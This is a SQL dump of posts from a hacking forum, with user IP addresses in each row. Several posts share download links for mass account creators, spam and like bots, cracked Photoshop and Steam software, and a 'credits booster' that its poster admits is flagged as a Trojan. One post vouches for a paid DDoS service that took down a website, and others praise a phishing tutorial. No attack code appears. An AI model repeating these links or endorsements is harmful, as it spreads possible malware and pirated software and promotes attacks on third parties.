Proof:\r\n\r\n[IMG]http://i.imgur.com/2jVns.png[/IMG][/u]\r\n\r\nYou can get the bot here: http://www.instaflow.in/\r\n\r\nFeatures\r\n\r\n * SuperLike\r\n * Automatic liking by hashtag\r\n * Live-Picture preview\r\n * Minimize to tray\r\n * Automatic update in-App\r\n * Like-counter', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d033af0a5eff3045f14a531ad22f1af', '0', '0'); INSERT INTO mybb_posts VALUES('1888', '408', '0', '30', 'Hotmail Account Creator', '0', '82', 'iTzIpod', '1347571776', 'Features:\r\n-Fully Automated with deathbycaptcha support (plus two others)\r\n-Randomly generates email name/password and saves in text file\r\n-Set any number of accounts to create\r\n- Multi-threaded\r\n\r\nIt also seems to fill in personal information on the accounts, after watching it for 5 minutes or so, which I\'m sure is a plus. Anyway, it\'s free so give it a whirl!\r\n\r\nDownload: http://www.mirrorcreator.com/files/0KWDJ8BS/hotmailcreator.exe_links\r\n\r\n\r\n[img]http://oi42.tinypic.com/28313.jpg[/img]\r\n\r\nEnjoy!\r\nRun in sandboxie if you need to, can\'t guarentee it\'s safe. \r\n\r\n\r\nhttps://www.virustotal.com/file/2bf8bb1920210f8663a1aaf344fcd66f83f5d7cb6165f57e22f61584c730aeea/analysis/1333736331/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bbfea2d45222a114e64af9d6283e237f', '0', '0'); INSERT INTO mybb_posts VALUES('1889', '409', '0', '30', '[Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1347571952', 'Forum Poster automatically register a user with the username, e-mail and password you typed on the board. It login as the registered user on the board and then post/reply it. All made automatically. With just one click!\r\n\r\nForum Poster support add, edit, delete forums URL, Import and export forum URL list.\r\n\r\nForum boards are an effective way to drive traffic to your site. With your posted Ads you can bring hundreds of new visitors to your site and increase your search engine rankings which counts on link popularity like Google.\r\n\r\nThe current version can post to \r\n1. phpBB2 V2.0.23 (http://www.phpbb2.com/)\r\n2. phpBB3 V3.0.7-PL1 (http://www.phpbb.com/)\r\n3. Invision Power Board V3.0.5 (http://www.invisionboard.com/)\r\n4. Snitz Forums 2000 V3.4.07 (http://forum.snitz.com/)\r\n5. vBulletin V4.0.2 (http://www.vbulletin.com/)\r\n6. Simple Machines Forum V1.1.11 (http://www.simplemachines.org/)\r\n7. WoltLab Burning Board V3.1.2 (http://www.woltlab.com/)\r\n8. WowBB V1.7 (http://www.wowbb.com/)\r\n9. MyBB V1.4.11 (http://www.mybboard.net/)\r\nAuto register,login,post/reply message,logout\r\nSupport Image Verification\r\nSupport skip Image Verification forum\r\nFind open board to post\r\nSelectable forum boards to post (input board number in field \'ForumID\')\r\nAfter login and post ,all \'host unreachable\',\'Connection with remote host lost\',\'Host unrechable\',\'404: Document not found\',\'500: CGI script failed\',\'Anti-bot\',\'Register Error\',\'Account need active\' forums save to one text file and remove from database.\r\nYou can View process in debug window\r\nSupport proxy server\r\nSupport add,delete,edit forum URL\r\nSupport Import,Export forum list\r\nEasy to use, just enter your texts and post it\r\nSupport post multi topic in one session\r\nYour messages can include links,picture.etc(Use BBcode in message,Please see forum help for more information), so your webpage traffic will raise alot [What\'s BBcode?]\r\nIncrease your position in Search Engines which counts on the link popularity to your site (like Google)\r\nShutdown PC when jobs done\r\nSupport Unicode and UTF-8 encode.\r\nSupport Reply Thread\r\nSupport different username and password for the message board\r\n\r\n\r\n\r\nDownload:\r\n\r\nhttp://www.mediafire.com/?xxlcc5ttns7tbyl', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa9cc54de74061f2e6b72bd67310de1b', '0', '0'); INSERT INTO mybb_posts VALUES('1890', '410', '0', '30', 'Enhance Views Credits Booster', '0', '82', 'iTzIpod', '1347572179', 'Hello LH,\n\nI\'m gonna share my Enhance Views Booster, it boost your primary credits very quickly.\nProof:\n[IMG]http://i.imgur.com/86yk6.jpg[/IMG]\n\nI got those credits within one hour. These credits can be used to increase Youtube views to promote your niches and make a profit. :P\n\n[url=https://www.virustotal.com/file/ab2dc5129597cc5c04c182bf4f0470bb87af21fef221dd110017a2bad38ee3d0/analysis/1346507135/][color=#FF4500]VIRUS SCAN[/color][/url]\n\n[url=http://www.mediafire.com/?561r6rke1mmudew][color=#4682B4]Download Link[/color][/url]', '24.212.197.164', '416597412', '1', '0', '82', '1347572202', '1', '7e3969abe46c27790b646bb61600c6b0', '0', '1347572202'); INSERT INTO mybb_posts VALUES('1891', '411', '0', '30', 'Enhance Views Booster', '0', '82', 'iTzIpod', '1347572348', 'I would like to contribute to the forum with this program.. \r\nYesterday, I had 5259 credits. And after running this program for 12 hours, I now have 8815296 credits. \r\n\r\n\r\n[url=http://www.mediafire.com/?qwf5o853yebauc5] Download Link[/url]\r\n\r\n[url=https://www.virustotal.com/file/ab2dc5129597cc5c04c182bf4f0470bb87af21fef221dd110017a2bad38ee3d0/analysis/] Virus Scan[/url]\r\n\r\n\r\n\r\nIt\'s Detected as a Trojan from 1/42 Antiviruses but it works so use it with Sandbox.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86ba3d10bf99c9a150d83f5a1a8d9e96', '0', '0'); INSERT INTO mybb_posts VALUES('1892', '412', '0', '7', '400th Thread', '0', '82', 'iTzIpod', '1347572744', 'Just saying.\r\n\r\nOver my past journey through L33t Hacking, we improved our activity by a lot. And also we are making progress on this forum! :D\r\n\r\nKeep advertising/posting/referring/staying active! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '003639871e2d052e380569d6dbeda523', '0', '0'); INSERT INTO mybb_posts VALUES('1893', '412', '1892', '7', 'RE: 400th Thread', '0', '61', 'NXK', '1347573569', 'We are!\n\nIt feels good to see. Hopefully We can get a new wave of members soon!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'f0eee37a3b361f72fe659836f02bb53d', '0', '0'); INSERT INTO mybb_posts VALUES('1894', '368', '1841', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347573589', '[quote=\'t3h jok3r\' pid=\'1841\' dateline=\'1347466214\']\r\n[quote=\'iTzIpod\' pid=\'1807\' dateline=\'1347392358\']\r\nWait does it have to be in the time duration of the contest. Or can it be threads from before?\r\n[/quote]\r\n\r\nThe threads have to be made after you check in.\r\n[/quote]\r\n\r\nAlright. Well. I just made like 10+ threads. I\'m done. + PMed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '567a30a4272f36e3041e3a96041c7849', '0', '0'); INSERT INTO mybb_posts VALUES('1895', '412', '1892', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347573907', 'Also just noticed I got 400 posts :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0271b12a5676c5d3097b1446865d8233', '0', '0'); INSERT INTO mybb_posts VALUES('1896', '407', '1887', '29', 'RE: Instagram Bot [Mass Like]', '0', '61', 'NXK', '1347583839', 'Trying this out now, Ill let you know how it goes.\n\nNot really working.', '99.253.94.204', '1677549260', '1', '0', '61', '1347584454', '1', '5dd975a45e33cba49e50a814f585e320', '0', '1347584454'); INSERT INTO mybb_posts VALUES('1897', '345', '1876', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347586277', '[quote=\'R?????zo?\' pid=\'1876\' dateline=\'1347550339\']\r\nI tried, not sure if you like it though.\r\n\r\n[img]http://i.imgur.com/iD3g6.png[/img]\r\n\r\n[img]http://i.imgur.com/QXFt5.png[/img]\r\n[/quote]\r\n\r\nI really like the 2nd one.\r\nIt\'s very good.\r\nI would try out for this, but I can\'t.. I mean. I don\'t have any good fonts. I have bad taste in fonts...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63564be93d04e76b2008a7555dd3f80b', '0', '0'); INSERT INTO mybb_posts VALUES('1898', '407', '1896', '29', 'RE: Instagram Bot [Mass Like]', '0', '82', 'iTzIpod', '1347586424', '[quote=\'NXK\' pid=\'1896\' dateline=\'1347583839\']\r\nTrying this out now, Ill let you know how it goes.\r\n\r\nNot really working.\r\n[/quote]\r\n\r\nIt\'s not? :/\r\nI didn\'t try it. I just got it from a friend. :/\r\nSorry. :(\r\n\r\nIf I get a better version, I will release it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '65ddc6ae190d5dc5f8bd57528719e91b', '0', '0'); INSERT INTO mybb_posts VALUES('1899', '413', '0', '29', 'EARN $50/HOUR EASILY', '0', '82', 'iTzIpod', '1347586825', '[align=center]Money Making eBook\n\n1. Daily Payout.\n2. Does not include a Black Hat method.\n3. Easy money.\n4. Little to no hard work.\n5. Make a nice amount of money.\n\n\nDownload:\n[url=http://www.mediafire.com/?4a79dtzxu7t66dm]CLICK[/url]\n\n\nProof of the money making.\n\n[IMG]http://www.godviden.dk/paypal_payment.png[/IMG]\n\n\n\nEnjoy.\n[/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347799296', '1', '8c9fce63f44f3036e26d6f5192d03040', '0', '1347799296'); INSERT INTO mybb_posts VALUES('2127', '413', '2108', '29', 'RE: EARN $50/HOUR EASILY', '0', '82', 'iTzIpod', '1347799380', '[quote=\'Timmy\' pid=\'2108\' dateline=\'1347748778\']\r\nIs it auto and can you fix the codes?\r\n[/quote]\r\n\r\nCan you stop asking if it\'s auto? Like seriously why not just download the damn thing..\r\n\r\nOr atleast view it.. Just change the URL to \r\nhttp://www.mediafire.com/view/?4a79dtzxu7t66dm', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a61e6ec74e35dc6c2cfd6e83164d1410', '0', '0'); INSERT INTO mybb_posts VALUES('2128', '446', '2106', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347799483', '[quote=\'t3h jok3r\' pid=\'2106\' dateline=\'1347748611\']\r\nI agree with Baws and he had some work to do @ iTzIpod.\r\n\r\n[b]He was the first active member on LH.[/b]\r\n[/quote]\r\n\r\nHe deserves a cookie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb76d264568622fc9900a6d5dddcc4c5', '0', '0'); INSERT INTO mybb_posts VALUES('1900', '414', '0', '29', 'Maximize Profits Using Google Adsense', '0', '82', 'iTzIpod', '1347587006', 'Hello! This will help you use AdSense to the fullest. Enjoy.\r\n\r\n\r\n[url=http://lh.rs/UCqlTRhXklJT] Download [/url]\r\n\r\n[url=http://r.virscan.org/report/affac294b7849c3c34976ff0311f52ee.html] Virus Scan[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '041207579067c9f28204498fc877db86', '0', '0'); INSERT INTO mybb_posts VALUES('1901', '415', '0', '59', '2000+ eBooks', '0', '82', 'iTzIpod', '1347587134', 'USE AT YOUR OWN RISK ( Most PDF files are viewed online ) I\'m not gonna download all of these and redistribute them since it would take forever. A thanks is appreciated.\n[spoiler][url=http://hightechmodz.com/E-Books.html]HTM E-Books[/url][/spoiler]\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1347587160', '1', 'c2ed44a02414d90f7d301effe0d2dd84', '0', '1347587160'); INSERT INTO mybb_posts VALUES('1902', '416', '0', '29', 'Earn Money from Captcha', '0', '82', 'iTzIpod', '1347587730', 'Download Link: [url=http://localhostr.com/vr3KUrJLbyV6] Click[/url]\r\nVirus Scan: [url=http://https://virustotal.com/file/713569990b574b280a1c6e88bf4e39b7bb596a435bc46757af9d84cdbdf50a32/analysis/1346992578/] Click[/url]', '24.212.197.164', '416597412', '1', '0', '82', '1347588519', '1', '2809b16877d17c7de454dc71aa76ec63', '0', '1347588519'); INSERT INTO mybb_posts VALUES('1903', '400', '1880', '59', 'RE: Free Pizza method', '0', '82', 'iTzIpod', '1347590168', 'To view it:\n\nhttp://www.mediafire.com/view/?8wzfg850302yrd8\n\nWow. Just read it.. It\'s the stupidest thing you can come up with. It\'s not worth 10 cents... \n\nInstead of selling it for money, you basically have to pay someone to take it instead....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b5a589a99e4bfe560e33b42ca350565', '0', '0'); INSERT INTO mybb_posts VALUES('1904', '401', '1881', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '61', 'NXK', '1347591326', 'Damn I thought I was the only one who knew about this...', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5558743a7984f6166524cccb8c1adff6', '0', '0'); INSERT INTO mybb_posts VALUES('1905', '399', '1869', '3', 'RE: [Bug] Error', '0', '1', 't3h jok3r', '1347593566', 'Solved. Thanks for the report', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e2017d0bc6d2e29e7a385811c2c6b966', '0', '0'); INSERT INTO mybb_posts VALUES('1906', '412', '1892', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347593867', 'Congratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd638f232541712554cc8976cbe15adaa', '0', '0'); INSERT INTO mybb_posts VALUES('3735', '735', '0', '59', 'Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '1', 't3h jok3r', '1349586132', 'Method 1:\r\nTo earn, while playing games.. go here - http://cur.lv/4sfx\r\nThe best way to win is by betting 0.001 and then choosing 4 mines. You can earn so easily that way and hard to lose!\r\n\r\n\r\nMethod 2:\r\nEarn like adfoc/adf.ly\r\n\r\nEarn per bitcoins per click by signing up here - http://n.cur.lv/Coin\r\n\r\n\r\nMethod 3:\r\nEarn money by leaving a page open for 5 minutes and then pressing next. You can earn a lot on this website - http://cur.lv/4sg7\r\n\r\n\r\nMethod 4 (autopilot):\r\nThis website is a little confusing to understand, but by signing up, you are added to a random payout machine. The most you can receive is however much money you have deposited plus .01 BTC. Payouts happen at .021 BTC, and they charge a payout fee of .001 BTC. - http://cur.lv/4sgf\r\n\r\nNote: I did not make this ebook. No credits to me', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5982d36d896fa06f5935139644e3e0a5', '0', '0'); INSERT INTO mybb_posts VALUES('1908', '401', '1881', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '1', 't3h jok3r', '1347594152', '/moved. Moved to the tutorials section. Nice tutorial, seems like it was a private method on getting Skype Resolvers for free.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca92abece9a51b654064bc030e2037e', '0', '0'); INSERT INTO mybb_posts VALUES('1909', '416', '1902', '29', 'RE: Earn Money from Captcha', '0', '5', 'Timmy', '1347594242', 'What are the payment methods and what is the minimum payout requirement?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ede4b748b87af27ce6d6a95c3da8f78b', '0', '0'); INSERT INTO mybb_posts VALUES('1910', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '5', 'Timmy', '1347594364', 'Nice tutorial. It\'s well-detailed and useful for n00bs', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4e791ed1de09da210d69ff91c15d460f', '0', '0'); INSERT INTO mybb_posts VALUES('1911', '417', '0', '4', 'HI!', '6', '184', 'Homeless', '1347595892', 'My name is Homeless, I like computers and computer related stuff. I\'ve been searching for a good hacking forum, hope I\'ve found it! :hehe:', '75.48.249.244', '1261500916', '0', '0', '0', '0', '1', '220ff03f8ad1acb8fd809f2e9680a829', '0', '0'); INSERT INTO mybb_posts VALUES('1912', '315', '1867', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1347619686', '[quote=\'iTzIpod\' pid=\'1867\' dateline=\'1347536967\']\r\n[quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\']\r\nThanks for accepting me :)\r\nI will gladly contribute with my unique skills, specially GFX :)\r\n[/quote]\r\n\r\nI love your GFX! ;) You have talent.\r\n[/quote]\r\n\r\nthanks, let me know if you need anything done.', '89.214.79.243', '1507217395', '1', '0', '0', '0', '1', '9d7b50d317185136938ca768a8b72979', '0', '0'); INSERT INTO mybb_posts VALUES('1913', '412', '1892', '7', 'RE: 400th Thread', '0', '2', 'Apathy', '1347623156', 'This is a great achievement.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '3228e26df008ac4b894ebc334c05f319', '0', '0'); INSERT INTO mybb_posts VALUES('1914', '18', '49', '2', 'RE: star test', '0', '2', 'Apathy', '1347623309', 'The theme we are using clashes with it. :/', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'c99947d93ed830774917fe9d93e2fe6b', '0', '0'); INSERT INTO mybb_posts VALUES('1915', '406', '1886', '30', 'RE: Skype Fake Quote Generator', '0', '2', 'Apathy', '1347623367', 'That is awesome thanks for the share.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '7af1c417973284b6cf8b4eb19e2a583c', '0', '0'); INSERT INTO mybb_posts VALUES('1916', '404', '1884', '30', 'RE: Sony Vegas Pro 11.0 & After Effects', '0', '2', 'Apathy', '1347623415', 'Have you used these personally?', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '70d662c20e1ff8fa5c05abee5e1a4868', '0', '0'); INSERT INTO mybb_posts VALUES('1917', '417', '1911', '4', 'RE: HI!', '0', '61', 'NXK', '1347623933', 'You\'ve come to the right place, we\'re still growing but give us some time!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '96e43acb7ba3e74a5454eb65590727ea', '0', '0'); INSERT INTO mybb_posts VALUES('1918', '417', '1911', '4', 'RE: HI!', '0', '82', 'iTzIpod', '1347628110', 'Welcome to L33t Hacking! Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '198c73adab24427266fed3e8bafd03a7', '0', '0'); INSERT INTO mybb_posts VALUES('1919', '412', '1906', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347628172', '[quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\']\r\nCongratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members.\r\n[/quote]\r\n\r\nThanks! :D\r\n\r\n@Apathy, Gratz on 100 posts :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '001568e0f99fd6f62a762d2f22b5cfac', '0', '0'); INSERT INTO mybb_posts VALUES('1920', '416', '1909', '29', 'RE: Earn Money from Captcha', '0', '82', 'iTzIpod', '1347628295', '[quote=\'Timmy\' pid=\'1909\' dateline=\'1347594242\']\r\nWhat are the payment methods and what is the minimum payout requirement?\r\n[/quote]\r\n\r\nPayment Methods: Western Union, Paypal, Liberty Reserve.\r\nMinimum Payout: I don\'t know. But I do know it works.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe6203bd4cd379e284396fd0bb3693cd', '0', '0'); INSERT INTO mybb_posts VALUES('1921', '404', '1916', '30', 'RE: Sony Vegas Pro 11.0 & After Effects', '0', '82', 'iTzIpod', '1347628346', '[quote=\'Apathy\' pid=\'1916\' dateline=\'1347623415\']\r\nHave you used these personally?\r\n[/quote]\r\n\r\nYes I have. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd5dfe9564bfb4fd6e91284753252f24', '0', '0'); INSERT INTO mybb_posts VALUES('1922', '406', '1915', '30', 'RE: Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347628413', '[quote=\'Apathy\' pid=\'1915\' dateline=\'1347623367\']\r\nThat is awesome thanks for the share.\r\n[/quote]\r\n\r\nNo problem. Just trying to give more to the community.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f0df830aa015a33b1bd633fea99c009', '0', '0'); INSERT INTO mybb_posts VALUES('1923', '401', '1904', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347628507', '[quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\']\r\nDamn I thought I was the only one who knew about this...\r\n[/quote]\r\n\r\nLol sorry. :/\r\nIf you want I can delete the thread and move it to the Elite Section?\r\nThat way only Elite members can view it. Instead of leechers.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db0fc4631e6e2553a9b0bf335a2bd67c', '0', '0'); INSERT INTO mybb_posts VALUES('1924', '315', '1912', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347628608', '[quote=\'R?????zo?\' pid=\'1912\' dateline=\'1347619686\']\r\n[quote=\'iTzIpod\' pid=\'1867\' dateline=\'1347536967\']\r\n[quote=\'R?????zo?\' pid=\'1864\' dateline=\'1347524860\']\r\nThanks for accepting me :)\r\nI will gladly contribute with my unique skills, specially GFX :)\r\n[/quote]\r\n\r\nI love your GFX! ;) You have talent.\r\n[/quote]\r\n\r\nthanks, let me know if you need anything done.\r\n[/quote]\r\n\r\nI don\'t wanna spam. So I will PM you. =]\r\nThanks again for making my Group seem successful :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77ad0e03ac61b10d325fac75d3515688', '0', '0'); INSERT INTO mybb_posts VALUES('1925', '418', '0', '16', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1347630216', 'Hey everyone.\n\niTzIpod here with a special giveaway for the community.\nThis is my SEing tutorial for beginners. \nI wrote this all myself.\nI spent a couple days working on it. \n1.7 days to be exact. \nAnyways\n\nHere is the download link:\n\nMediaFire:\n[url=http://www.mediafire.com/?1c303xmmmbotoc4] Click[/url]\nMediaFire [To View]:\n[url=http://www.mediafire.com/view/?1c303xmmmbotoc4] Click[/url]\n\nMirror [LocalHostr]:\n[url=http://lh.rs/sM0y3Mcad1pu] Click[/url]\nMirror [DropBox]:\n[url=https://www.dropbox.com/s/4muhvsk82h1qtpq/SEing%20Tutorial.pdf] Click[/url]\n\nVirus Scan:\n[url=https://www.virustotal.com/file/73f018076efd1ca6eee496446c4755870d2093b53b26946d06d792dab119a849/analysis/1347630046/] Click[/url]\n\nEnjoy! \nAny way of thanks is appreciated. \n\n- iTzIpod\nL33tHacking.net Once a L33t, Always a L33t.', '24.212.197.164', '416597412', '1', '0', '82', '1347630241', '1', '4c4b853d45e1dc179df4a939bea48ab7', '0', '1347630241'); INSERT INTO mybb_posts VALUES('1926', '419', '0', '49', '[Suggestion] Signature Characters + for + Members', '0', '82', 'iTzIpod', '1347630708', 'Hey, \r\nI want to suggest for L33t Hacking that Upgraded/+ Members get an additional amount of characters for their signature. Because for now, Members (Normal) have a max characters of 255. And Upgraded Members have 255 max characters too.\r\nI just wanna lift that by a little. Doesn\'t have to be too much or anything.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9accf86465a4186b00ead2489d0dd66', '0', '0'); INSERT INTO mybb_posts VALUES('1927', '420', '0', '49', '[Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '82', 'iTzIpod', '1347631082', 'Whenever I try to edit [b]MY[/b] threads, I get this error:\r\n\r\n[img]http://i.imgur.com/AsEml.png[/img]\r\n\r\nBut I find that kind of unfair. Since Upgraded members shouldn\'t need to have that. Or Mods.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d02753679c0751eaf0127cc6cde4187', '0', '0'); INSERT INTO mybb_posts VALUES('1928', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '67', 'HoverCatz', '1347631245', 'yea its bad, and remove the Minimum char count in the reply box please. Its so easy to get around, but annoying to do all the time.\n[hr]\nI cant post 2 replies. -.-', '178.74.56.137', '-1303758711', '1', '0', '67', '1347631322', '1', 'cdfefdcad053a328580e5f65d87adc1a', '0', '1347631322'); INSERT INTO mybb_posts VALUES('1929', '421', '0', '49', '[Suggestion] Upgraded Members get no waiting time', '0', '82', 'iTzIpod', '1347631417', 'I\'m guessing this is a bad suggestion.. But it\'s worth a try.\r\n\r\nI don\'t know what the waiting time is for normal members. But I still feel that the Upgraded Member\'s waiting time is still too much. If we can either reduce that or remove that just for the upgraded members, that would be great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ebc9770a451123beb6b7cc33f10ce78c', '0', '0'); INSERT INTO mybb_posts VALUES('1930', '401', '1923', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '61', 'NXK', '1347632093', '[quote=\'iTzIpod\' pid=\'1923\' dateline=\'1347628507\']\r\n[quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\']\r\nDamn I thought I was the only one who knew about this...\r\n[/quote]\r\n\r\nLol sorry. :/\r\nIf you want I can delete the thread and move it to the Elite Section?\r\nThat way only Elite members can view it. Instead of leechers.\r\n[/quote]\r\n\r\nNah leave it, it\'s public. Let the leechers leech.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '2a06c0fe628cdd8cbec8f904dcabb1c6', '0', '0'); INSERT INTO mybb_posts VALUES('1931', '401', '1930', '12', 'RE: How to get a free skype resolver with working numbers !', '0', '82', 'iTzIpod', '1347632962', '[quote=\'NXK\' pid=\'1930\' dateline=\'1347632093\']\r\n[quote=\'iTzIpod\' pid=\'1923\' dateline=\'1347628507\']\r\n[quote=\'NXK\' pid=\'1904\' dateline=\'1347591326\']\r\nDamn I thought I was the only one who knew about this...\r\n[/quote]\r\n\r\nLol sorry. :/\r\nIf you want I can delete the thread and move it to the Elite Section?\r\nThat way only Elite members can view it. Instead of leechers.\r\n[/quote]\r\n\r\nNah leave it, it\'s public. Let the leechers leech.\r\n[/quote]\r\nLeeching is bad though :/\r\nI hate leechers.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '31db1a93cc92bb42683fc9db3073ae11', '0', '0'); INSERT INTO mybb_posts VALUES('1932', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1347633352', 'Very nice service. I vouch this. \n=]\nWorked and DDoSed a website in less than 5 minutes for 1 hour+ =]\nLegit.\n\n\nVOUCH.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2be6c26ed4b443fb494f094d90e8bc80', '0', '0'); INSERT INTO mybb_posts VALUES('1934', '18', '49', '2', 'RE: star test', '0', '61', 'NXK', '1347633523', 'I\'m not a fan of the green \r\n\r\neveryone else got a update accept smods ahah :(', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '91807011d8b2f06bf1c4654fc49cb518', '0', '0'); INSERT INTO mybb_posts VALUES('1937', '423', '0', '9', 'Earn money by Copy & Pasting', '0', '82', 'iTzIpod', '1347636154', 'Hey LH\r\n\r\nIn this short method I\'m going to show you how to make some quick cash on a daily basis. \r\nIn fact, this is probably the simplest way to make instant money.\r\nAnyone can do that without having any prior experience or marketing skills.\r\n\r\nIf you know how to do simple \"copy-paste\" operations, you already have excellent chances to succeed with this method.\r\n\r\n\r\nYou can make around $50-$60 a day.\r\nTitle: Easy Copy & Paste Money\r\nPages: 17\r\nInvestment: 0\r\n\r\n\r\nVirus Scan: [url=https://www.virustotal.com/url/af320fb038817f7cebf4dd9e905629273ffa290861c3c660e365bc5f65c55182/analysis/1347583863/] Click[/url]\r\n\r\n\r\nDownload here:[url=http://www.filemsg.com/2phedwmzzbdw]Click [/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf0a36ea278d29f29de30597aed5651c', '0', '0'); INSERT INTO mybb_posts VALUES('1938', '424', '0', '61', 'Money Making eBooks', '0', '82', 'iTzIpod', '1347636203', 'Enjoy them ^-^\r\n\r\nDownload:\r\nhttp://www.mediafire.com/?df0eba2d4q79r3c', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79f0a5f59b9dfb846564d024e978c954', '0', '0'); INSERT INTO mybb_posts VALUES('1939', '425', '0', '61', 'Huge SEing Giveaway [50+]', '0', '82', 'iTzIpod', '1347636332', 'Hey Unique.\nHope you are enjoying these giveaways! :D\n\nDownload:\nhttp://www.mediafire.com/?al9z1ml8bo9u8m2\n\nNote: This is safe to download.', '24.212.197.164', '416597412', '1', '0', '82', '1347717569', '1', '3bf62fef74d7f12393dc2fb514af6b4f', '0', '1347717569'); INSERT INTO mybb_posts VALUES('1940', '426', '0', '30', '[100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347636446', '[spoiler=Download][url=http://www.mediafire.com/?g8qa22aqmftitlq]Click Here[/url][/spoiler]\n[spoiler=Virus Scan][url=http://www.screensnapz.com/v/?i=ZYGhilVSZ.png]Click Here[/url][/spoiler]', '24.212.197.164', '416597412', '1', '0', '82', '1347718085', '1', 'b589550428d42afda1954f973425d8a7', '0', '1347718085'); INSERT INTO mybb_posts VALUES('1941', '427', '0', '61', 'Photoshop CS6 Extended 64 Bit', '0', '82', 'iTzIpod', '1347636588', 'Photoshop CS6 Extended 64-Bit Free Download \n\nDownload link:\n\nhttp://www.mediafire.com/?va8k4oj5j9327o0\n\nEnjoy! :D\n\n- iTzIpod\n\nNote: This is safe to download.', '24.212.197.164', '416597412', '1', '0', '82', '1347717496', '1', '57b58e2b1350615ae437f52447dd5532', '0', '1347717496'); INSERT INTO mybb_posts VALUES('1942', '428', '0', '74', 'Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347636703', '[align=center]Ever wanted Free Steam Games? Download Dark Steam and get all games that are on Steam for free! \n\nOriginal site: http://www.darksteam.info\n\nDownload: https://dl.dropbox.com/s/pwqiy7jq25y41i3/4.1.5.exe\n\nVirus Scan (2 false positives): https://www.virustotal.com/url/fb89d8416617c30464cfb8f36706c9a5c69f927b3446d68994f7f460088d8aaf/analysis/1347635270/\n\nProof it works:\n\n[img]http://zz9cap.com/img/ee83d1b0ffb389aaec36.png[/img][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347636754', '1', 'cc61d8cc1b01aa4164da906a83606f55', '0', '1347636754'); INSERT INTO mybb_posts VALUES('1943', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1347643245', 'I don\'t think I have 25+ posts, but I read a ton of stuff on LH sooo you think I could have 4?', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '2f66c68e1ba5d36961089ab2bab47171', '0', '0'); INSERT 